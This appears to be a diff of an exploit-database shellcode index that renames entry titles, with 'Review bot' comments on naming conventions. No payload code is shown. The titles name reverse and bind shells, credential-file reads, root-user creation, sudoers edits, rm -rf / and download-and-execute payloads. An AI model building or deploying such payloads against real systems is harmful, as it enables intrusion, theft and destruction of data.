43531,shellcodes/arm/43531.c,"Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
43531,shellcodes/arm/43531.c,"Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
43532,shellcodes/arm/43532.c,"Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
43533,shellcodes/arm/43533.c,"Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)",2013-09-04,gunslinger_,shellcode,arm
43534,shellcodes/arm/43534.c,"Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes)",2010-08-31,"Jonathan Salwan",shellcode,arm
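Review bot: The new title for 43531, "chmod( /etc/passwd 0777)", drops the "_" placeholders that every other call-style title in this hunk keeps (for example "creat(_/root/pwned__ 0777)" on 43532) and leaves a stray space after the opening parenthesis. Keep the original "chmod(_/etc/passwd__ 0777)" form, or change 43532 to 43534 in the same commit so the convention stays uniform and searches on the call signature match all four rows.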
@ -776,46 +815,47 @@ id,file,description,date,author,type,platform
43545,shellcodes/linux_sparc/43545.c,"Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes)",2009-01-01,anathema,shellcode,linux_sparc
43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4
43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4
43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
43549,shellcodes/linux_x86-64/43549.c,"Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64
43550,shellcodes/linux_x86-64/43550.c,"Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
43555,shellcodes/linux_x86-64/43555.c,"Linux/x86-64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43556,shellcodes/linux_x86-64/43556.asm,"Linux/x86-64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43557,shellcodes/linux_x86-64/43557.asm,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43558,shellcodes/linux_x86-64/43558.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
43559,shellcodes/linux_x86-64/43559.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64
43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64
41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86
41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86
41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86
43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)",2017-03-29,WangYihang,shellcode,linux_x86
41827,shellcodes/windows_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
41827,shellcodes/windows_x86-64/41827.txt,"Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86
41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
42016,shellcodes/windows/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
42016,shellcodes/windows/42016.asm,"Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64
42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64
42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86
42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86
42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
42522,shellcodes/linux_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42523,shellcodes/linux_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42594,shellcodes/linux_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,linux_x86
42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86
42992,shellcodes/windows_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
42992,shellcodes/windows_x86-64/42992.c,"Windows/x86-64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86
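Review bot: The retitled row for 41630 still spells the syscall "exceve" ("exceve(/bin/sh) + Encoded Shellcode"), so a search for "execve" will keep missing it; fix the spelling while the line is being touched. Separately, 43554 goes from "sys_access() Egghunter" to "Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access()" with the size left at 49 bytes; check against the file whether 49 bytes is the egghunter alone and, if so, say that in the title. The 42016 title "Windows/x86-64 / x86" also does not follow the "Platform/arch" pattern used by the other renamed Windows rows.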

1 id file description date author type platform
17 13256 shellcodes/bsd/13256.c BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes) 2004-09-26 Sinan Eren shellcode bsd
18 13257 shellcodes/bsdi_x86/13257.txt BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes) 2004-09-26 duke shellcode bsdi_x86
19 13258 shellcodes/bsdi_x86/13258.txt BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes) 2004-09-26 vade79 shellcode bsdi_x86
20 13260 shellcodes/bsdi_x86/13260.c BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes) BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes) 2004-09-26 anonymous shellcode bsdi_x86
21 13261 shellcodes/freebsd/13261.txt FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) 2009-04-13 c0d3_z3r0 shellcode freebsd
22 13262 shellcodes/freebsd_x86/13262.txt FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes) 2008-09-12 suN8Hclf shellcode freebsd_x86
23 13263 shellcodes/freebsd_x86/13263.txt FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes) 2008-09-10 suN8Hclf shellcode freebsd_x86
24 13264 shellcodes/freebsd_x86/13264.txt FreeBSD/x86 - Kill All Processes Shellcode (12 bytes) 2008-09-09 suN8Hclf shellcode freebsd_x86
25 13265 shellcodes/freebsd_x86/13265.c FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes) 2008-09-05 sm4x shellcode freebsd_x86
26 13266 shellcodes/freebsd_x86/13266.asm FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes) FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes) 2008-08-25 sm4x shellcode freebsd_x86
27 13267 shellcodes/freebsd_x86/13267.asm FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes) 2008-08-21 sm4x shellcode freebsd_x86
28 13268 shellcodes/freebsd_x86/13268.asm FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes) 2008-08-21 sm4x shellcode freebsd_x86
29 13269 shellcodes/freebsd_x86/13269.c FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes) 2008-08-19 c0d3_z3r0 shellcode freebsd_x86
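Review bot: The " + " separator is applied to 13260 ("+ ToUpper Encoded") and 13266 ("+ Null-Free") but not to 13265 ("Return Results Null-Free Shellcode") or 13269 ("execve(/bin/sh) Encoded Shellcode") in the same block, so the attribute convention is only half applied. Rename those two rows in this commit as well. 13261 also keeps "FreeBSD x86 / x64" where the other rows use the "FreeBSD/x86" and "FreeBSD/x86-64" forms.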
38 13278 shellcodes/freebsd_x86/13278.asm FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes) 2004-09-26 Scrippie shellcode freebsd_x86
39 13279 shellcodes/freebsd_x86-64/13279.c FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes) 2009-05-18 Hack'n Roll shellcode freebsd_x86-64
40 13280 shellcodes/freebsd_x86-64/13280.c FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes) 2009-05-15 c0d3_z3r0 shellcode freebsd_x86-64
41 13281 shellcodes/generator/13281.c Linux/x86 - execve() Null-Free Shellcode (Generator) Linux/x86 - execve() + Null-Free Shellcode (Generator) 2009-06-29 certaindeath shellcode generator
42 13282 shellcodes/generator/13282.php Linux/x86 - Bind TCP Shell Shellcode (Generator) 2009-06-09 Jonathan Salwan shellcode generator
43 13283 shellcodes/generator/13283.php Windows XP SP1 - Bind TCP Shell Shellcode (Generator) Windows (XP SP1) - Bind TCP Shell Shellcode (Generator) 2009-06-09 Jonathan Salwan shellcode generator
44 13284 shellcodes/generator/13284.txt Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator) 2008-08-31 sorrow shellcode generator
45 13285 shellcodes/generator/13285.c Linux/x86 - Command Generator Null-Free Shellcode (Generator) Linux/x86 - Command Generator + Null-Free Shellcode (Generator) 2008-08-19 BlackLight shellcode generator
46 13286 shellcodes/generator/13286.c Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator) 2008-08-04 Avri Schneider shellcode generator
47 13288 shellcodes/generator/13288.c (Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes) Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator) 2006-10-22 izik shellcode generator
48 13289 shellcodes/generator/13289.c Windows x86 - Multi-Format Encoding Tool Shellcode (Generator) Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator) 2005-12-16 Skylined shellcode generator
49 13290 shellcodes/ios/13290.txt iOS Version-independent - Null-Free Shellcode 2008-08-21 Andy Davis shellcode ios
50 13291 shellcodes/hardware/13291.txt Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode 2008-08-13 Gyan Chawdhary shellcode hardware
51 13292 shellcodes/hardware/13292.txt Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) 2008-08-13 Varun Uppal shellcode hardware
82 13324 shellcodes/linux_x86/13324.c Linux/x86 - Read /etc/passwd Shellcode (65+ bytes) 2009-02-27 certaindeath shellcode linux_x86
83 13325 shellcodes/linux_x86/13325.c Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes) 2009-02-20 Jonathan Salwan shellcode linux_x86
84 13326 shellcodes/linux_x86/13326.c Linux/x86 - killall5 Shellcode (34 bytes) 2009-02-04 Jonathan Salwan shellcode linux_x86
85 13327 shellcodes/linux_x86/13327.c Linux/x86 - PUSH reboot() Shellcode (30 bytes) Linux/x86 - reboot() + PUSH Shellcode (30 bytes) 2009-01-16 Jonathan Salwan shellcode linux_x86
86 13328 shellcodes/generator/13328.c Linux/x86 - Shellcode Obfuscator Null-Free (Generator) Linux/x86 - Shellcode Obfuscator + Null-Free (Generator) 2008-12-09 sm4x shellcode generator
87 13329 shellcodes/linux_x86/13329.c Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes) Linux/x86 - Reverse UDP (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes) 2008-11-23 XenoMuta shellcode linux_x86
88 13330 shellcodes/linux_x86/13330.c Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes) 2008-11-23 XenoMuta shellcode linux_x86
89 13331 shellcodes/linux_x86/13331.c Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes) 2008-11-19 Rick shellcode linux_x86
90 13332 shellcodes/linux_x86/13332.c Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes) 2008-11-18 XenoMuta shellcode linux_x86
91 13333 shellcodes/linux_x86/13333.txt Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes) Linux/x86 - setuid(0) + execve(/bin/sh_0_0) + Null-Free Shellcode (28 bytes) 2008-11-13 sch3m4 shellcode linux_x86
92 13334 shellcodes/linux_x86/13334.txt Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes) 2008-09-29 sorrow shellcode linux_x86
93 13335 shellcodes/linux_x86/13335.c Linux/x86 - iopl(3) + asm(cli) + while(1){} Shellcode (12 bytes) 2008-09-17 dun shellcode linux_x86
94 13336 shellcodes/linux_x86/13336.c Linux/x86 - System Beep Shellcode (45 bytes) 2008-09-09 Thomas Rinsma shellcode linux_x86
95 13337 shellcodes/linux_x86/13337.c Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) Linux/x86 - Reverse TCP (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) 2008-08-25 militan shellcode linux_x86
96 13338 shellcodes/linux_x86/13338.c Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes) 2008-08-19 Reth shellcode linux_x86
97 13339 shellcodes/linux_x86/13339.asm Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes) 2008-08-18 0in shellcode linux_x86
98 13340 shellcodes/linux_x86/13340.c Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) 2008-08-18 GS2008 shellcode linux_x86
101 13343 shellcodes/linux_x86/13343.asm Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes) 2007-04-02 mu-b shellcode linux_x86
102 13344 shellcodes/linux_x86/13344.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes) 2007-03-09 Kris Katterjohn shellcode linux_x86
103 13345 shellcodes/linux_x86/13345.c Linux/x86 - Kill All Processes Shellcode (11 bytes) 2007-03-09 Kris Katterjohn shellcode linux_x86
104 13346 shellcodes/linux_x86/13346.s Linux/x86 - execve() Read Shellcode (92 bytes) Linux/x86 - execve() + Read Shellcode (92 bytes) 2006-11-20 0ut0fbound shellcode linux_x86
105 13347 shellcodes/linux_x86/13347.c Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
106 13348 shellcodes/linux_x86/13348.c Linux/x86 - Set System Time to 0 + exit() Shellcode (12 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
107 13349 shellcodes/linux_x86/13349.c Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
110 13352 shellcodes/linux_x86/13352.c Linux/x86 - execve(rm -rf /) Shellcode (45 bytes) 2006-11-17 Kris Katterjohn shellcode linux_x86
111 13353 shellcodes/linux_x86/13353.c Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes) 2006-11-16 Revenge shellcode linux_x86
112 13354 shellcodes/linux_x86/13354.c Linux/x86 - execve(/bin/sh) Shellcode (22 bytes) 2006-11-16 Revenge shellcode linux_x86
113 13355 shellcodes/linux_x86/13355.c Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes) Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() + Null-Free Shellcode (111+ bytes) 2006-10-22 izik shellcode linux_x86
114 13356 shellcodes/linux_x86/13356.c Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes) Linux/x86 - setreuid() + Executes Command Shellcode (49+ bytes) 2006-08-02 bunker shellcode linux_x86
115 13357 shellcodes/linux_x86/13357.c Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
116 13358 shellcodes/linux_x86/13358.c Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes) Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
117 13359 shellcodes/linux_x86/13359.c Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
118 13360 shellcodes/linux_x86/13360.c Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
119 13361 shellcodes/linux_x86/13361.c Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes) 2006-07-04 oveRet shellcode linux_x86
120 13362 shellcodes/linux_x86/13362.c Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes) Linux/x86 - execve() + Diassembly + Obfuscation Shellcode (32 bytes) 2006-05-14 BaCkSpAcE shellcode linux_x86
121 13363 shellcodes/linux_x86/13363.c Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes) 2006-05-08 Benjamin Orozco shellcode linux_x86
122 13364 shellcodes/generator/13364.c Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator) 2006-05-08 Benjamin Orozco shellcode generator
123 13365 shellcodes/linux_x86/13365.c Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2) 2006-05-01 hophet shellcode linux_x86
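Review bot: The new title for 13362, "execve() + Diassembly + Obfuscation", keeps the "Diassembly" misspelling and now splits one technique (disassembly obfuscation) into what reads as two separate attributes. Suggest "execve() + Disassembly Obfuscation Shellcode (32 bytes)". In the same block, 13355 and 13358 show the " + " convention applied cleanly, so this row is the outlier.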
136 13378 shellcodes/linux_x86/13378.c Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes) 2006-04-03 Gotfault Security shellcode linux_x86
137 13379 shellcodes/linux_x86/13379.c Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes) 2006-04-03 Gotfault Security shellcode linux_x86
138 13380 shellcodes/linux_x86/13380.c Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes) 2006-03-12 izik shellcode linux_x86
139 13381 shellcodes/linux_x86/13381.c Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes) Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() + Null-Free Shellcode (236 bytes) 2006-02-07 phar shellcode linux_x86
140 13382 shellcodes/linux_x86/13382.c Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes) 2006-01-26 NicatiN shellcode linux_x86
141 13383 shellcodes/linux_x86/13383.c Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes) Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) + XORED Encoded Shellcode (41 bytes) 2006-01-25 izik shellcode linux_x86
142 13384 shellcodes/linux_x86/13384.c Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes) Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes) 2006-01-25 izik shellcode linux_x86
143 13385 shellcodes/linux_x86/13385.c Linux/x86 - Add Root User (xtz) To /etc/passwd + No Password Shellcode (59 bytes) 2006-01-21 izik shellcode linux_x86
144 13386 shellcodes/linux_x86/13386.c Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes) Linux/x86 - execve(/bin/sh) + Anti-Debug Trick (INT 3h trap) Shellcode (39 bytes) 2006-01-21 izik shellcode linux_x86
145 13387 shellcodes/linux_x86/13387.c Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes) 2006-01-21 izik shellcode linux_x86
146 13388 shellcodes/linux_x86/13388.c Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes) 2006-01-21 izik shellcode linux_x86
147 13389 shellcodes/linux_x86/13389.c Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes) Linux/x86 - Eject CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes) 2006-01-21 izik shellcode linux_x86
148 13390 shellcodes/linux_x86/13390.c Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes) 2006-01-21 izik shellcode linux_x86
149 13391 shellcodes/linux_x86/13391.c Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes) 2006-01-21 izik shellcode linux_x86
150 13392 shellcodes/linux_x86/13392.c Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes) 2006-01-21 izik shellcode linux_x86
151 13393 shellcodes/linux_x86/13393.c Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes) 2006-01-21 izik shellcode linux_x86
152 13394 shellcodes/linux_x86/13394.c Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes) 2006-01-21 izik shellcode linux_x86
153 13395 shellcodes/linux_x86/13395.c Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes) 2006-01-21 izik shellcode linux_x86
154 13396 shellcodes/linux_x86/13396.c Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes) Linux/x86 - (eax != 0 and edx == 0) + exit() Shellcode (4 bytes) 2006-01-21 izik shellcode linux_x86
155 13397 shellcodes/linux_x86/13397.c Linux/x86 - reboot() Shellcode (20 bytes) 2006-01-21 izik shellcode linux_x86
156 13398 shellcodes/linux_x86/13398.c Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes) 2006-01-21 izik shellcode linux_x86
157 13399 shellcodes/linux_x86/13399.c Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes) 2006-01-21 izik shellcode linux_x86
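Review bot: in the row for 13384 the new title "execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)" splits "+1" into what now reads as the "+" feature separator followed by "1 Encoded", and it leaves the qualifier after the word "Shellcode", unlike the neighbouring 13383 ("execve(/bin/sh) + XORED Encoded Shellcode"). If "+1" names the encoding, keep it as one token and move it in front of "Shellcode" so the row follows the same pattern as the other encoded entries in this hunk.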
